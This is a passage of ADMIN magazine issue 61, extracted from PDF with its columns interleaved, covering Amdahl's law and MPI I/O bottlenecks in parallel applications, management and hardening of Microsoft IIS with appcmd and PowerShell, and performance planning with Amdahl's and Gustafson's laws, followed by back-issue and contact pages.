tween processors, which is a function munication time in Amdahl’s Law. on your application and algorithm. Se-
of n, the number of processors: One of the best is from Bob Brown at rial performance has several sources,
Duke [1]. He provides a good analogy but usually a predominant source

When this equation is substituted


back into Amdahl’s Law, the result is
Equation 8 for speedup a:

Notice that the denominator is now a


function of n2.
From Equation 8 you can plot the
speedup. As with the previous
problem, assume a parallel portion
p = 0.8, leaving a serial portion
s = 0.2. Assigning the base serial Figure 2: Speedup with new model.

86 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Parallel Performance N U TS A N D B O LTS

is I/O. When an application starts, it processes. You have a couple of ways The first explanation is from Am-
most likely needs to read an input file to do this. The first, which I already dahl’s Law, which illustrates the
so that all of the processes have the mentioned, is to have each process do theoretical speedup of an applica-
problem information. Some applica- its own I/O. This approach requires tion when running with more pro-
tions also need to write data at some careful coding, or you can acciden- cesses and the limitation of serial
point while it runs. At the end, the ap- tally corrupt data file(s). code on wall clock time. Although
plication will likely write the results. The most common way is to have it can be annoying that parallel pro-
Typically these I/O steps are accom- all the processes perform I/O with cessing is limited by serial perfor-
plished by a single process to avoid MPI-IO. This is an extension of MPI mance and not something directly
collisions when multiple processes that was incorporated in MPI-2 and involving parallel processing, it does
do I/O, particularly writes. If two allows I/O from all MPI processes in explain that at some point, your ap-
processes open the same file, try to an application (or a subset of the pro- plication will not run appreciable
write to it, and the filesystem isn’t cesses). It is beyond the scope of this faster unless your application has a
designed to handle multiple writes, article to discuss MPI-IO, but remem- very small serial portion.
the data might be written incorrectly. ber it can be a tool to help you reduce The second explanation for decreased
For example, if process 1 is supposed the serial portion of your application performance is serial bottlenecks in
to write data first, followed by pro- by parallelizing the I/O [3]. an application caused by I/O. Exam-
cess 2, what happens if process 2 Before you undertake a journey to ining the amount of time an applica-
writes first followed by process 1? modify your application to parallel- tion spends on I/O is an important
You get a mess. However, with care- ize the I/O, you should understand step in understanding the serial por-
ful programming, you can have mul- whether I/O is a significant portion tion of your application. Luckily you
tiple processes write to the same file. of the total application runtime. If the can find tools and libraries to paral-
As the programmer, you have to be I/O portion is fairly small – where lelize the application I/O; however,
very careful that each process does the definition of “fairly small” is up at some fundamental level, the ap-
not try to write where another pro- to you – it might not be worth your plication has to do some I/O to read
cess is writing, which can involve a time to rewrite the I/O portion of the input and write output, limiting the
great deal of work. application. In a previous article I dis- scalability of the application (scal-
Another reason to use a single pro- cuss various ways to profile the I/O of ability limit).
cess for I/O is ease of programming. your application [4]. The goal is to push this scalability
As an example, assume an applica- If serial I/O is not a significant por- limit to the largest number of pro-
tion is using the Message Passing tion of your application, you might cesses possible, so get out there and
Interface (MPI) library [2] to paral- need to look for other sources of se- improve the serial portion of your
lelize code. The first process in an rialized performance. Tracking down applications! n
MPI application is the rank 0 process, these sources can be difficult and
which handles any I/O on its own. tedious, but it is usually worthwhile
For reads, it reads the input data because it improves the scalability Info
and sends it to other processes with and performance of the application – [1] Amdahl’s Law and Communication Times:
MPI_Send, MPI_Isend, or MPI_Bcast and who doesn’t like speed? [https://webhome.phy.duke.edu/~rgb/
from the rank 0 process and with Beowulf/beowulf_book/beowulf_book/
MPI_Recv, MPI_Irecv, or MPI_Bcast, Summary node20.html]
for the non-rank-0 processes. Writes [2] Message Passing Interface:
are the opposite: The non-rank-0 pro- Writing a useful parallel applica- [https://en.wikipedia.org/wiki/Message_
cesses send their data to the rank 0 tion is a great accomplishment. At Passing_Interface]
process, which does the I/O on behalf some point you will want to try [3] MPI-IO:
of all processes. running the application with larger [https://www.mcs.anl.gov/~thakur/dtype/]
Having a single MPI process do the core counts to improve performance, [4] “Improved Performance with Paral-
I/O on behalf of the other processes which is one of the reasons you lel IO,” by Jeff Layton, [https://www.
by exchanging data creates a serial wrote a parallel application in the admin-magazine.com/HPC/Articles/
bottleneck in your application be- first place. However, when at some Improved-Performance-with-Parallel-I-O]
cause only one process is doing I/O, point increasing the number of pro-
forcing the other processes to wait. cessors used in the application stops The Author
If you want your application to scale, decreasing and starts increasing the Jeff Layton has been in the HPC business for al-
you need to reduce the amount of wall clock time of the application, most 25 years (starting when he was 4 years old).
serial work done by the application, it’s time to start searching for rea- He can be found lounging around at a nearby Frys
including moving data to or from sons why this is happening. enjoying the coffee and waiting for sales.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 87
N U TS A N D B O LTS Managing Microsoft IIS

Securing and managing Microsoft IIS

The Right
Tools
If you use IIS on Windows servers, you can fully access the web server’s features and manage it effectively with
on-board tools, including the well-known Internet Information Services (IIS) Manager, Windows Admin Center,
and PowerShell. By Thomas Joos
In this article, I look into the op- Manager. The fastest way to launch PowerShell. In Windows Admin Cen-
tions Microsoft provides for effective this tool is to enter inetmgr.exe. If you ter, you can use the Services area. The
management of Internet Information do need to restart the IIS system ser- system services themselves can be ac-
Services (IIS). You can easily man- vice, you can use cessed by typing services.msc.
age web servers on Windows Server To restart the web server, run either
2019 with multiple tools in parallel net stop w3svc of the following commands at the
(e.g., the IISAdministration module net start w3svc command line:
in PowerShell). The command line
on Windows servers also offers a way or you can work with Stop‑Service, iisreset
to manage the web server with the Start‑Service, or Restart‑Service in iisreset /noforce
appcmd and iisreset
tools, not only for
servers with graphical
user interfaces, but
also for core servers
and containers. In this
article, I assume you
have IIS configured on
Windows Server 2019
(Figure 1), but most
settings also apply to
Windows Server 2012
R2 and 2016.
Lead Image © Christian Delbert, 123RF.com

Managing the
Web Server and
Sites

Once IIS is up and


running, it can be
managed with the IIS Figure 1: With PowerShell, you can check whether IIS is installed on a server.

88 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Managing Microsoft IIS N U TS A N D B O LTS

In addition to starting and stopping %WinDir%\system32\inetsrv\appcmd.exe U automatically show the appropriate


the entire server, you can also tem- add backup "<name of backup>" options if IIS is installed on a server.
porarily disable individual websites. The options are located in the Exten-
All other websites on the server are Then, you can delete existing back- sions section of the navigation side-
unaffected; open the IIS Manager ups with the bar from IIS. Microsoft is expected
and click on the website you want to integrate IIS management perma-
to restart or stop. In the Actions area appcmd.exe delete backup U nently into the menu structure of
of the console, the Manage Website "<name of backup>" Windows Admin Center. Also in the
section displays the commands for Admin Center, install the extension
restarting and stopping. command. for managing IIS over the network on
At the command prompt, you can use the corresponding server, if necessary.
the appcmd tool to restart or quit. Type Developer Tools in Internet Microsoft also provides the necessary
the commands extension on GitHub [1].
Explorer and Edge After the IIS extension connects to
appcmd stop site /site.name:contoso The developer tools in Internet Ex- the appropriate server in Windows
appcmd start site /site.name:contoso plorer and Edge are interesting for Admin Center, select the website
administrators and developers alike. whose settings you want to change.
to stop and restart the Contoso web- To access them, press F12. The tools If the server settings are not dis-
site. However, the tool is not directly display the source code for a page played, your monitor’s resolution
in the path for the command prompt, and help with error analysis (e.g., is not high enough. In this case, it
so it cannot be called directly. First if a page takes a long time to load). might be useful to hide the Win-
you need change directory to \Win‑ The Network tab lets you check the dows Admin Center menubar with
dows\System32\inetsrv. You can get loading times of pages to determine the arrow in the upper left corner.
detailed help by typing appcmd /?. which areas of a website delay load- Afterward, Windows Admin Center
Because help is context sensitive, you ing. To analyze a page later, just save displays the commands for manag-
can also get appropriate support for the output. ing IIS in a separate menu area. The
individual commands, such as appcmd settings are then accessible. The Set-
site /?. Managing IIS in Windows tings, Bindings, Limits, and Applica-
tion Pool tabs are used to manage
Admin Center
Viewing Requests and the settings for the site. The Moni-
Microsoft provides an extension to toring tab also provides a separate
Creating Backups Windows Admin Center for servers area for monitoring the performance
The appcmd command displays the on which IIS is installed. This exten- of a web server.
current requests to a web server and sion already
backs up its data. Current requests has almost all
can be retrieved and the settings of a of the same
server backed up by typing: functions as the
IIS Manager.
appcmd list request The advantage
appcmd add backup <name> of Windows
Admin Center
Creating a backup is a good idea be- for central ad-
fore you start making system changes. ministration of
The existing backups can be viewed IIS is that cen-
and restored with: tral administra-
tion is far eas-
appcmd list backups ier than with
appcmd restore backup <name> the IIS Manager
(Figure 2).
However, if you back up the server To use the ex-
before changing to a distributed con- tension, add it
figuration and restore this backup, in the Windows
you will have a local configuration Admin Center
again after the restore. settings from
Of course, you should run this backup Extensions. The
as a regular task on Windows and Admin Cen-
save the IIS configuration to a file: ter will then Figure 2: Managing IIS with Windows Admin Center is relatively easy.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 89
N U TS A N D B O LTS Managing Microsoft IIS

Adjusting the Security after you copy a rule, you can rename or website level by the HTTP Redirec-
it with Rename‑NetFirewallRule, al- tion feature. However, you must first
Settings though you can assign a new name as install this feature as a role service.
You can use the tools mentioned soon as you copy it: In addition to redirection, you can also
above to configure the security set- define the behavior of the configuration
tings of the web server. In most cases, Copy‑NetFirewallRule U at this point. If you check the Redirect
IIS Manager is still used. Important ‑DisplayName "Require Outbound U all requests to the exact destination (in-
settings primarily relate to the firewall Authentication" U stead of relative to destination) box, re-
on the server, for which you can use ‑NewName "Alternate Require Outbound U quests are always redirected to exactly
the standard firewall console (wf.msc; Authentication" the address you specified in the redirec-
Figure 3) or Windows Admin Center. tion. This also applies when requests
PowerShell also lets you set rules for Firewall rules in PowerShell can also are sent to subfolders. If you select the
the Windows firewall on web serv- be deleted with Remove‑NetFirewall‑ Only redirect requests to content in this
ers and comes with the advantage of Rule. directory (not subdirectories) checkbox,
scripting and automating the configu- the server will redirect requests that are
ration work. To create a new firewall Securing Access directed to subfolders of the redirected
rule, for example, use: folder directly to the redirection target.
The IP Address and Domain Restric- You can set the SSL bindings for web
New‑NetFirewallRule U tions feature lets you create access pages in IIS Manager or you can use
‑DisplayName "ICMP block" U rules to block access to predefined IP Windows Admin Center and the IIS
‑Direction Inbound U ranges and domains. To begin, enable extension. Unencrypted access to
‑Protocol icmp4 U the Edit Feature Settings option. You IIS on SSL pages also can be redirect
‑Action Block must install the IP and Domain Re- automatically, for which Microsoft
strictions role service. provides the free URL Rewrite [2]
As you can see, you need to specify HTTP redirection means that all ac- extension. In the IIS Manager, first in-
the name of the protocol, define the cess to a specific URL is automati- stall the extension and then call URL
protocol, and control the respective cally redirected to another URL. For Rewrite. Add Rule lets you create new
action. Instead of creating a new fire- example, you can redirect your site if rules (Figure 4).
wall rule with New‑NetFirewallRule, it you are currently editing parts of it. You can also redirect manually in two
is often easier to copy existing firewall You could have, say, all requests to ways. For the first method, you can
rules with the Copy‑NetFirewallRule www.contoso.com/marketing/default. define the corresponding settings in
command. If you work with IPsec, aspx redirected to the www.contoso. the configuration of the HTTP 403
you can also copy the rules with the com/sales/default.aspx site. Redirec- error message by calling the IIS Man-
Copy‑NetIPsecRule cmdlet. Of course, tions can be configured at the server ager on the server and clicking on the
server name and
the website. The
Error Pages option
is found here, as
well. Now double-
click on the error
pages in the IIS
section on the
start page and
open the 403 error
item. Now acti-
vate the Respond
with a 302 redirect
option, enter the
HTTPS URL that
the users should
access, and press
OK to confirm.
This type of redi-
rection does not
always work. In
this case, use the
Figure 3: The Windows firewall plays an important role in securing Windows servers. This also applies to IIS. second option

90 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Managing Microsoft IIS N U TS A N D B O LTS

for redirection. Start IIS Manager Logfiles can be saved in any folder. to the server. If you do not check the
and click on the page for which you By default, the files end up in the \ Use local time for file naming and
want to configure HTTP redirection. inetpub\logs\LogFiles folder. In the rollover option, UTC (world time) is
Click Bindings and change the bind- first selection field, you need to spec- used by default.
ing port from 80 to another free port ify in the listbox whether you want
(e.g., 8001). Now right-click Sites to create a logfile for each web page Optimizing Server
and create a new site with the Add or a file for the entire server. Various
command. As the site name, in the logfile formats are available; however,
Performance
Add Site Binding dialog, assign to you should leave logfile encoding set Compression can improve server
the new website the name that us- to UTF 8. Logfile formats include: response times and save bandwidth
ers will use to access the server over n W3C (default): These logfiles are when transmitting web pages. You
HTTP (e.g., powerpivot.contoso.int). stored as text; the Select Fields but- can manage compression with the
Now create a physical path. The ton lets you specify what should feature of the same name in IIS Man-
folder remains empty; you only need be logged in the file. The individ- ager. Some settings are only available
it for IIS, not for the configuration. ual fields are separated by spaces. at the server level. However, many
Leave the binding set to port 80. Be- n IIS: This selection also saves the settings can also be made at the web-
cause you have already changed the logfiles in text format; however, site and application levels, so each
binding of the default page, this port the comma-separated individual application uses its own settings for
is available. As the hostname, enter fields are fixed and therefore can- compression. Enabling compression
the name to which you want the not be adjusted. will increase the load on the server
server to respond (e.g., powerpivot. n NCSA (National Center for Super- hardware.
contoso.int). computing Applications): Here, Parts of the websites can be made avail-
After you confirm that you want to too, the fields are fixed, and less able in the web server’s cache, so re-
create the website, you will then information is logged than with trieving these parts does not expose the
receive a message that port 80 is al- the other protocol methods. server to load. You can use the Output
ready in use because port 80 is still In this window, you also specify Caching feature in IIS Manager to man-
assigned to the default website in IIS, when new logfiles should be cre- age this feature. The cache is enabled
even if you changed the port of the ated – according to a certain schedule by default, and you can set limits in
site from 80 to another port. However, (hourly, daily, weekly, or monthly), the settings; however, the cache is only
this page is closed during the install, according to a certain size, or not at useful in production after you have
so it has no significance to the server. all. The selection depends on, among defined rules to determine which data
Next, click on the newly created page other things, the number of visitors you want the server to cache.
and then double-click HTTP Redirect
in the IIS section.
Check the Redirect requests to this
destination box and enter the HTTPS
address to which you want the server
to redirect the requests. Check the
Redirect all requests to exact destina-
tion box and then press Apply. If us-
ers now enter the URL for which you
have configured redirection, IIS will
detect this access and automatically
redirect the request.

Activating and Configuring


Logging
In addition to tracking failed requests,
you can also log normal IIS opera-
tions through the Logging item on the
IIS Manager home page. Logging can
be enabled for individual pages and
applications separately in the Actions
area of the console. By default, log-
ging is enabled for the server itself
and for websites. Figure 4: URL Rewrite lets you execute automatic URL redirections.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 91
N U TS A N D B O LTS Managing Microsoft IIS

Remote IIS Management The certificate is then connected to ‑filter "system.webServer/security/U


the website and requires the finger- requestFiltering" U

In PowerShell and Windows Admin print of the certificate, which is dis- ‑name "removeServerHeader" U

Center, you can access a server running played during the create process: ‑value "True"
IIS over the network. Although this is
also possible with IIS Manager, it is far $certPath = 'Cert:<\LocalMachine\My\> U to remove the server header.
more complicated to configure and use. CEC247<...>CCC4'
For example, to open a connection, use: $providerPath = U
Conclusions
'IIS:\SSLBindings\0.0.0.0!443'
Enter‑PSSession ‑ComputerName <Servername> Get‑Item $certPath | U IIS can be configured in several ways.
New‑Item $providerPath Not surprisingly, PowerShell is one
Get-Website displays the websites on of them, which allows you to save
the server, including the bindings and You can also check the bindings in actions as scripts and execute them
all settings. You can see the individual IIS Manager or with Windows Admin repeatedly and, if necessary, automat-
bindings by typing Get-WebBinding, Center. To do so, call up the set- ically. The second common approach
which lets you check which websites tings of the website and check to see is from Windows Admin Center. IIS
are available on a server and which whether the certificate has been ac- Manager, on the other hand, is no
bindings are in use. From this infor- cepted and the settings have been set. longer the tool of choice. Regardless
mation, you can also add bindings to In Windows Admin Center, you will of which tool you choose, the motto
websites (e.g., for the use of SSL). To find the options under Bindings. has to be: security first! n
create a new binding, for example, to IIS in Windows Server 2016 and 2019
enable SSL for a site, enter: also supports HTTP/2, and you can
use wildcards for the host header: Info
New‑WebBinding U [1] IIS extension for Windows Admin Cen‑
‑Name '<Site name>' U New‑WebBinding U ter: [https://github.com/microsoft/IIS.
‑IPAddress * U ‑Name "Default Web Site" U Administration/releases]
‑Port 443 U ‑IPAddress "*" U [2] URL Rewrite: [https://www.iis.net/
‑Protocol https ‑Port 80 U downloads/microsoft/url‑rewrite]
‑HostHeader "*.contoso.com"
The two Get‑ commands mentioned The Author
earlier then show the successful bind- If you want to prevent the web server Thomas Joos is a freelance IT consultant and
ing (Figure 5). In PowerShell, you from advertising itself externally as has been working in IT for more than 20 years.
can also output the bindings specifi- an IIS 10 server, enter In addition, he writes hands‑on books and
cally for a website, papers on Windows and other Microsoft topics.
Set‑WebConfigurationProperty U Online you can meet him on [http://thomasjoos.
(Get‑Website ‑Name '<Default Website>').U ‑pspath 'MACHINE/WEBROOT/APPHOST' U spaces.live.com].
bindings.Collection

as shown in Figure 5.

Self-Signed
Certificates
For connection secu-
rity, IIS also supports
self-signed certificates
with the New‑Self‑
SignedCertificate
cmdlet. To create a
self-signed certificate
for a web page (Fig-
ure 5), type:

New‑SelfSignedCertificate U

‑CertStoreLocation U

'<Cert:\LocalMachine\My>' U

‑DnsName '<s2.joos.int>' Figure 5: You can issue and assign self-signed certificates in PowerShell.

92 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
N U TS A N D B O LTS Performance Tuning Dojo

Planning performance without


running binaries

Blade
Runner
We examine some mathemagical tools that approximate time-to-execute given the parallelizable
segment of code. By Federico Lucifredi
Usually the task of a performance in discrete chunks to be run simul- than analytically, by slicing this
engineer involves running a workload, taneously on different CPU cores. space into an infinite number of
finding its first bottleneck with a pro- A classic example is approximating infinitesimal rectangles and sum-
filing tool, eliminating it (or at least the value of pi. Many algorithms ming their areas. This scenario is an
minimizing it), and then repeating this that numerically approximate pi are ideal parallel numerical challenge,
cycle – up until a desired performance known, variously attributed to Euler, as computing one rectangle’s area
level is attained. However, sometimes Ramanujan, Newton, and others. has no data dependency whatsoever
the question is posed from the re- Their meaning, not their mathemati- with that of any another. The more
verse angle: Given existing code that cal derivation, is of concern here. the slices, the higher the precision.
requires a certain amount of time to A simple approximation is given by You just need to throw CPUs at
execute (e.g., 10 minutes), what would Equation 1. the problem: in this case, 5 million
it take to run it 10 times faster? Can it loops to reach 48 decimal places of
be done? Answering these questions is accuracy.
easier than you would think. This way of approximating pi is not
very efficient, but it uses a very
Parallel Processing The assertion is that pi is equal to simple algorithm to implement
the area under the curve in Figure 1. in both linear and parallel coding
The typical parallel computing Numerical integration solves this styles. Carlos Morrison published a
workload breaks down a problem equation computationally, rather message passing interface (MPI) [1]
pi implementation [2] in his book
Build Supercomputers with Rasp-
berry Pi 3 [3].

Speed Limit
Can you make the code twice as
fast? Sure! Can you make it 10 times
faster? Maybe. That factor, 2x or
10x, is called speedup in computing
(Equation 2).
Lead Image © Lucy Baldwin, 123RF.com

Speedup is defined as the ratio of the


original and new (hopefully improved)
Figure 1: Approximating pi by numerical integration of the area under the curve. measurements, so if your code used

94 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Performance Tuning Dojo N U TS A N D B O LTS

Embarrassingly Parallel Algorithms which is derived by observing that you There are some important observations
can use as many CPUs as you want to to be made here. First, accelerating
An algorithm is considered “embarrass‑
drive 95 percent of the problem asymp- code is usually about removing bottle-
ingly parallel” [5] when no design effort
totically to zero time (p=0.95), and necks, not absolute speedup numbers
is required to partition the problem into
you will be left with that one minute for the whole codebase. Second, given
completely separate parts. If no data
dependency exists between the problem
(1 – p=0.05). Once you do the math more resources, you will usually
subparts, no communication coordination (1/0.05=20), that is the maximum pos- process more data or do more work.
(and corresponding computational stall) ever sible speedup under ideal conditions Gustafson’s law [6] provides an alter-
takes place, making the problem trivial to (i.e., the absolute limit with infinite native formulation: If more resources
partition. Of course, there is nothing embar‑ resources thrown at the problem). are made available, larger problems
rassing about using these algorithms – quite can be solved within the same time,
the contrary, it is the hallmark of good archi‑ Amdahl’s Law as opposed to Amdahl’s law, which
tecture. Some examples of algorithms in this analyzes how a fixed workload can be
class, among others, are: IBM’s Gene Amdahl contributed the accelerated by adding more resources.
n Numerical integration – by slice law bearing his name in 1967, cou- Keep these points in mind and remem-
n Monte Carlo methods – by sample pling the previous observation with ber that, in the real world, network
n The Mandelbrot set – by function point the simple fact that you generally do communication is always a distributed
n Ray tracing or other computer graphics not have infinite horsepower to drive system’s presumptive bottleneck.
rendering – by frame or ray the parallel section of the code to zero
n Genetic algorithms – by genotype time (Equation 4).
n Convolutional neural networks – by filter
Roy Batty’s Tears
n Computer simulation – by scenario The power of Amdahl’s law is found
Choosing an efficient parallel algorithm is in its analytical insight. Code is mea-
essential to achieving good return on your
sured in time, not in lines, so some
hardware or computer time investment.
Amdahl’s observation factors in the minimal performance testing is still
speedup of the parallel section. The required. If you determine that only
to take one second to execute and new term p/s is the ratio of time 50 percent of an algorithm’s criti-
now takes half a second, you have a spent in the parallel section of the cal section can be parallelized, its
2x speedup. Speedup measures for code and the speedup it achieves. theoretical speedup can’t exceed 2x,
latency or throughput – today I am us- Continuing with the 20-minute ex- as you see in Figure 2. Furthermore,
ing the latency formulation. ample, say you have accelerated the it’s not practical to use more than
Amdahl’s law [4] observes that now-parallel section of the code with 12 cores to run this code, because it
parallelism only accelerates a frac- a 4x speedup, and you find that the can attain more than 90 percent of
tion of the application’s code, put- resulting speedup for the whole pro- the maximum theoretical speedup
ting a limit on its effect. Ideally, gram is 3.47x (Equation 5): with 12 cores (a 1.84x speedup).
speedup would be linear, with a You know this before attempting any
doubling of processing resources optimization, saving you effort if the
consistently halving the compute best possible result is inadequate to
time, and so on indefinitely. Unfor- achieving your aims.
tunately, few algorithms can deliver
on this promise (see the “Embar-
rassingly Parallel Algorithms” box);
most algorithms approximate linear
speedup over a few CPUs and es-
sentially decay into constant time
with many CPUs.
For example, if your code takes 20
minutes to execute and just one min-
ute of it can’t be parallelized, you can
tell up front, without knowing any
other details about the problem, that
the maximum speedup theoretically
possible is 20x (Equation 3),

Figure 2: Maximum theoretical speedup with 50 percent serial code.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 95
N U TS A N D B O LTS Performance Tuning Dojo

In an alternative scenario with only Without invoking the C-beams speech Info
five percent serial code in the bottle- or even going near the Tannhäuser [1] MPI: [https://www.mpi‑forum.org/docs/]
neck (Figure 3), the asymptote is at Gate [7], one must point out parallel- [2] MPI pi implementation:
20x speedup. In other words, if you ism’s massive overhead, already obvious [https://github.com/PacktPublishing/
can successfully parallelize 95 per- from the examples here. Execution time Build‑Supercomputers‑with‑Raspberry‑Pi‑3/
cent of the problem, under ideal cir- can be significantly reduced, yet you blob/master/Chapter02/03_MPI_08_b.c]
cumstances the maximum speedup accomplish this by throwing resources [3] Morrison, Carlos. Build Supercomputers
for that problem is 20x. This handy at the problem – perhaps suboptimally. with Raspberry Pi 3. Pakt Publishing, 2016
analysis tool can quickly determine On the other hand, one could argue [4] Amdahl’s law:
what can be accomplished by accel- that idle CPU cores would not be doing [https://webhome.phy.duke.edu/~rgb/
erating code for a problem of fixed anything productive. All those cycles Beowulf/beowulf_book/beowulf_book/
size. would be lost … like tears in rain. n node21.html]
[5] Embarrassingly parallel algorithms:
[https://en.wikipedia.org/wiki/
Embarrassingly_parallel]
[6] Gustafson’s law: [https://en.wikipedia.org/
wiki/Gustafson%27s_law]
[7] Tears in rain monologue from Blade
Runner: [https://en.wikipedia.org/wiki/
Tears_in_rain_monologue]

The Author
Federico Lucifredi (@0xf2) is the Product Man‑
agement Director for Ceph Storage at Red Hat
and was formerly the Ubuntu Server Product
Manager at Canonical and the Linux “Systems
Management Czar” at SUSE. He enjoys arcane
hardware issues and shell‑scripting mysteries
and takes his McFlurry shaken, not stirred. You
Figure 3: Theoretical speedup with five percent serial code. The lower curve is from Figure can read more from him in the new O’Reilly title
2 for comparison. AWS System Administration.

96 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Back Issues S E RV I C E

ADMIN Network & Security

NEWSSTAND Order online:


bit.ly/ADMIN-Newsstand

ADMIN is your source for technical solutions to real-world problems. Every issue is packed with practical
articles on the topics you need, such as: security, cloud computing, DevOps, HPC, storage, and more!
Explore our full catalog of back issues for specific topics or to complete your collection.

#60/November/December 2020
Securing TLS
In this issue, we look at ASP.NET Core, a web-development
framework that works across OS boundaries.

On the DVD: Ubuntu Server Edition 20.10

#59/September/October 2020
Custom MIBs
In this issue, learn how to create a Management Information Base
module for hardware and software.
On the DVD: CentOS 8.2.2004

#58/July/August 2020
Graph Databases
Discover the strengths of graph databases and how they work, and
follow along with a Neo4j example.
On the DVD: Fedora 32 Server (Install Only)

#57/May/June 2020
Artificial Intelligence
We look at the progress and application of artificial intelligence,
deep and machine learning, and neural networks.
On the DVD: Ubuntu Server 20.04 LTS

#56/March/April 2020
Secure DNS
In this issue, we look at solutions for encrypted DNS, so admins
can block domains that distribute malware.
On the DVD: Kali Linux 2020.1 (Live)

#55/January/February 2020
AWS Lambda
This issue emphasizes performance tuning, tweaking, and
adaptations with various tools and techniques.
On the DVD: openSUSE Leap 15.1

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 97
S E RV I C E Contact Info / Authors

WRITE FOR US
Admin: Network and Security is looking • unheralded open source utilities
for good, practical articles on system ad- • Windows networking techniques that
ministration topics. We love to hear from aren’t explained (or aren’t explained
IT professionals who have discovered well) in the standard documentation.
innovative tools or techniques for solving We need concrete, fully developed solu-
real-world problems. tions: installation steps, configuration
Tell us about your favorite: files, examples – we are looking for a
• interoperability solutions complete discussion, not just a “hot tip”
• practical tools for cloud environments that leaves the details to the reader.
• security problems and how you solved If you have an idea for an article, send
them a 1-2 paragraph proposal describing your
• ingenious custom scripts topic to: [email protected].

Contact Info
Editor in Chief While every care has been taken in the content of
Joe Casad, [email protected] the magazine, the publishers cannot be held re-
Managing Editors sponsible for the accuracy of the information con-
Rita L Sooby, [email protected] tained within it or any consequences arising from
Lori White, [email protected] the use of it. The use of the DVD provided with the
Senior Editor magazine or any material provided on it is at your
Ken Hess own risk.

Localization & Translation Copyright and Trademarks © 2021 Linux New


Ian Travis Media USA, LLC.

News Editor No material may be reproduced in any form


Jack Wallen whatsoever in whole or in part without the writ-
ten permission of the publishers. It is assumed
Copy Editors
that all correspondence sent, for example, let-
Authors Amy Pettle, Megan Phelps
ters, email, faxes, photographs, articles, draw-
Konstantin Agouros 48 Layout ings, are supplied for publication or license to
Dena Friesen, Lori White third parties on a non-exclusive worldwide
Erik Bärwaldt 76 Cover Design basis by Linux New Media unless otherwise
Dena Friesen, Illustration based on graphics by stated in writing.
Chris Binnie 30, 72
Maksym Yemelyanov, 123RF.com All brand or product names are trademarks
Dr. Andreas Bühlmeier 58 Advertising of their respective owners. Contact us if we
Brian Osborn, [email protected] haven’t credited your copyright; we will always
Ken Hess 3 phone +49 89 3090 5128 correct any oversight.
Thomas Joos 88 Publisher Printed in Nuremberg, Germany by hofmann
Brian Osborn infocom GmbH on recycled paper from 100% post-
Jeff Layton 84
Marketing Communications consumer waste; no chlorine bleach is used in the
Martin Loschwitz 16, 42, 66 Gwen Clark, [email protected] production process.
Linux New Media USA, LLC Distributed by Seymour Distribution Ltd, United
Federico Lucifredi 94 2721 W 6th St, Ste D Kingdom
Lawrence, KS 66049 USA
Thorsten Scherf 22 ADMIN (ISSN 2045-0702) is published bimonthly
Customer Service / Subscription by Linux New Media USA, LLC, 2721 W 6th St, Ste D,
Tim Schürmann 26 For USA and Canada: Lawrence, KS 66049, USA. January/February 2021.
Email: [email protected] Periodicals Postage paid at Lawrence, KS. Ride-
Dr. Udo Seidel 10
Phone: 1-866-247-2802 Along Enclosed. POSTMASTER: Please send
Kai Wähner 34 (Toll Free from the US and Canada) address changes to ADMIN, 2721 W 6th St, Ste D,
For all other countries: Lawrence, KS 66049, USA.
Jack Wallen 8
Email: [email protected] Published in Europe by: Sparkhaus Media GmbH,
Matthias Wübbeling 52, 64 www.admin-magazine.com Zieblandstr. 1, 80799 Munich, Germany.

98 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M

You might also like